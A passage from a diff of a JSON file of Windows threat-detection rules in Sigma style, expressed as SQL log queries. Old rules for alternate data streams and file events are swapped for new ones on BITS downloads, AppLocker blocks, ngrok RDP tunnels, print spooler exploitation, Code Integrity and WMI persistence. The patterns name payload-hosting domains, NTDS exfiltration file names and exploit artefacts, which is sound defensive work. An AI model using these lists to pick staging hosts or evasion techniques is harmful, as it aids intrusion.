'%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + 
"description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE 
'%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
(Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE 
'\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a 
well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' 
ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", - "falsepositives": [ - "Application installation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR 
((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "file_rename_win_not_dll_to_dll.yml" - }, - { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE 
'%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of 
templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "status": "test", - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "status": "experimental", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1068" + "attack.t1546.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 
'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "status": "test", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE 